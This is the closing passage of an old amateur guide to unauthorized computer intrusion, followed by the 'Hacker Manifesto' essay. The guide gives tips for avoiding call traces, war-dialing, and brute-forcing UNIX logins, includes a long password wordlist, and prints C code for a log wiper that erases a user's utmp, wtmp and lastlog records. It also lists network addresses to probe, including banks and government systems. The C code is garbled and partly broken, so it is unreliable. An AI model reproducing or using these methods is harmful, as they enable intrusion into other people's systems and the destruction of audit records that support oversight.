can also hack them through this outdail. More on scanning later. Another great use for outdials is to dial up long-distance BBS #'s or other telenet #'s or any # of things you can think of! Also it is much harder and more expensive to trace a call if you are using an outdial. It will be traced to the system. A thing that you should do before you even attempt to dial out a number is the redial command. This is because it will dial out the number that was dialed just before and is an excellent way to find new systems to hack:). Also, on a ventel modem, type "d" and it will list 5 modem numbers in its memory that you can connect to! So I guess right now you're saying, "Well, how do I find one of these outdials?"Well, you will need to find a system called a, "Decserver". What I would recommend is to get a list of NUA's from somebody or a magazine such as phrack#21, or 2600. They should have a list of them in there. Chapter 14: Scanners A scanner is a program that will dial every # in a 3-digit prefix from 0000-9999. For example: My telephone number is 898-3788 (yeah right) so if I thought my school was in the 898 area, I would put in "898" for the 3-digit prefix and set it to dial every number from 0000-9999. Using 898 in the front o each number, I am certain to find the number that my school modem is at and every other modem that will connect me to a system. Just make sure that you either dial *67 if it asks you for a certain code thing so that your calls cannot be traced or just use an outdial. Note! A good thing to do whenever you hack is to either use a converter or a modem jammer. This will also prevent your calls from being traced :) Chapter 15: Brute force hacking Brute force hacking is a method made for systems that don't keep track of you trying to login such as UNIX. You will notice that on some UNIX boxes that the default will not work. It can be very frustrating! This method approaches the system by typing the default in where it ask you to login and use this whole list of words for passwords. You have to do it over and over again. It will take a long time, but every hacker must be patient. An example of what I am saying is doing something like this: login: sysadmin password: aaa login incorrect login: sysadmin password: academia etc. I am not sure how you would make a program that can make brute force hacking a lot easier, but I am sure that there is a way and if you look around on the web a little bit, I am sure that you would be able to find the C-script. So just search around a little bit. As you see, it takes a lot of work. You will have to do this for each default, so just be patient. Most of these passwords come from LOD. I put a few in there but not nearly as many as them. ------------------------------------------------------------ Brute force hacking ------------------------------------------------------------ aaa academia ada adrian aerobics daniel danny dave deb debbie jester johnny joseph joshua judith rascal really rebecca remote rick airplane albany albatross albert alex alexander algebra alias alpha alphabet ama amy analog anchor andy andrea animal answer anything arrow arthur asshole athena atmosphere attention aligator alpine altitude billy bacchus badass bailey anana bandit banks bass batman beauty beaver beethoven beloved benz beowulf berkeley berlin beta beverly bob brenda brian bridget broadway bumbling bubbles buger belt bitch basturd bee butt bust bib cardinal carmen carolina caroline castle cat celtics change charles charming charon chester celebrate cattle cadabra chilly chelsey cucumber deborah december desperate develop diet digital discovery disney dog drought duncan dudu dust dimple dip doodle dildo dic disaster damn dig dug easy eatme edges edwin egghead eileen einstein elephant elizabeth ellen emerald engine engineer enterprise enzyme euclid evelyn extension fairway felicia fender fermat finite flower foolproof football format forsythe fourier fred friend frighten fun fagot fumble fabulous fix fiddle finger gabriel garfield gauss george gertrude gibson ginger gnu gol golffer gorgeous graham gryphon guest guitar gilbert hacker hug halarius hell heep hip hop hope humble hill head hello heck huddle ireland juggle julia kathleen kermit kernel knight kathy lambda larry lazarus lee leroy lewis light lisa louis lynne list limp mac macintosh mack maggot magic malcolm mark marck marc markus marty marvin master maurice merlin mets michael ichelle mike minimum minsky mogul moose mozart nancy napoleon network newton next olivia oracle orca orwell osiris outlaw oxford paciic painless pam paper password pat patricia penguin pete peter reagan robot robotics rolex ronald rosebud rosemary roses ruben rules ruth sal saxon scheme scott scotty secret sensor serenity sex shark sharon shit shiva shuttle simon simple singer single smile smiles smooch smother snatch snoopy soap socrates spit spring subway success summer super support surfer suzanne tangerine tape target taylor telephone thomas temptation tiger toggle tomato toyota trivial theresa unhappy unicorn unknown cigar classic cofee harmony harold harvey philip phoenix pierre urchin utility vicky coke collins comrade computer condo condom cookie cooper create creation creator cretin daemon dancer heinlein hello help herbert honey horse imperial include ingres innocuous irishman isis japan jessica pizza plover polynomial praise prelude prince protect pumpkin puppet rabbit rachmaninoff rainbow raindrop random virinia virgin warren water weenie whatnot whitney will william willie winston wizard wombat yosemite zap ------------------------------------------------------------ Well, like I said, I added a couple words in there, maybe 20 or so, but most of these come from LOD. In my next book, I will keep every UNIX password I get and have my own password list. Chapter 16: C-script for erasing your logins Well, if you want to really be secure, this is one of the best ways! There might be some ways that you could think of typing in to erase it but it won't work. Only a program can erase your logins. Aren't programs great:) I already told you what a C-script is so just copy this or type it in in your C program and then compile it. ------------------------------------------------------------ #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) *pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >=0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); close(f); } } else printf("%s: ?/n",who); } mai(argc,argv) int argc; char *argv[]; { if (argc--2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!/n"); } else printf("Error./n"); } ------------------------------------------------------------ Well, that is an excellent way to keep yourself safe. I would highly recomend it! Chapter 17: Keeping yourself safe Well, the things that you will mostly need are up at the front in the list that I gave you of stuff that you will need. What I would recommend is to: 1.) encrypt your hard drive 2.) use a modem jammer before you even get onto telenet 3.) first find yourself an outdial, then dial up another number that you are interested in hacking or dial up into another telenet number and connect onto there and hack some NUA's from there. 4.) Don't brag to anyone! about you hacking any systems. 5.) Never Hack Government systems unless you know what the hell your doing and plan on moving. If you pretty much do that, I would say that you should be safe. Chapter 18: NUA's that I have found Unfortunately Almost all of the NUA's that I have found are government systems. There are a few that seem like they might be pretty cool, but make sure that you know what you are doing! NUA TIPS 201 156 A UNIX system! excelent to start out with but the problem is that it is for more experienced UNIX hackers. 90155 ? 2241 It will say"DTE". Seems to be a bank up in main. 22417 Government system, leave it alone! 22425 ? 2236 Gives you a "<"prompt. tell it anything, when you go to login, it will ask for a transaction ID. 3215 NASA, LEAVE IT ALONE!!!!!!!! 22430 Bank in Athens Greece. Looks very interesting! 201170 asks you to enter a command 201179 asks you for an application 201200 Not sure, wouldn't take a chance 201201 same as 201200 202255 type "help" then choose your terminal type. I wouldn't take any chances though, looks a little tight on security. Chapter 19: Conclusion Thanx to: 1.) LOD 2.) The HackerZ Hideout 3.) Every hacker that helped me out 4.) My parents for putting up with me and not getting to mad for taking out effort in school. 5.) And all my friends that let me skip band practice :) If you wish to contact me at anytime,write to my E-mail address:[email protected] This book was intended for newbies. I am stuck between being an intelligent hacker and newbie, but as soon as I get some books on some newer systems and learn how they work, I will be putting in all the defaults and helpful commands. It wont have as much newbie material, it will be for more experienced hackers. I hope this file has helped you with all of your hacking needs. When I was a newbie there wasn't to many things to look at, it was all trial and error. It still will be for you, but you have a better idea of what hacking is like. All I recommend for you to do now is to read more books. +++ICE KOOL+++ HACKERS MANIFESTO ------------------------------------------------------------ Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...Damn kids. They're all alike. But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? I am a hacker, enter my world...Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...Damn underachiever. They're all alike. I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..." Damn kid. Probably copied it. They're all alike. I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me...or feels threatened by me... or thinks I'm a smart ass...Or doesn't like teaching and shouldn't be here... Damn kid. All he does is play games. They're all alike. And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it...this is where I belong..." I know everyone here...even if I've never meet them, never talked to them, may never hear from them again... I know you all... Damn kid. Tying up the phone line again. They're all alike... You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert. This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's or our own good, yet we're the criminals. Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for. I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all. After all, we're all alike. +++The Mentor+++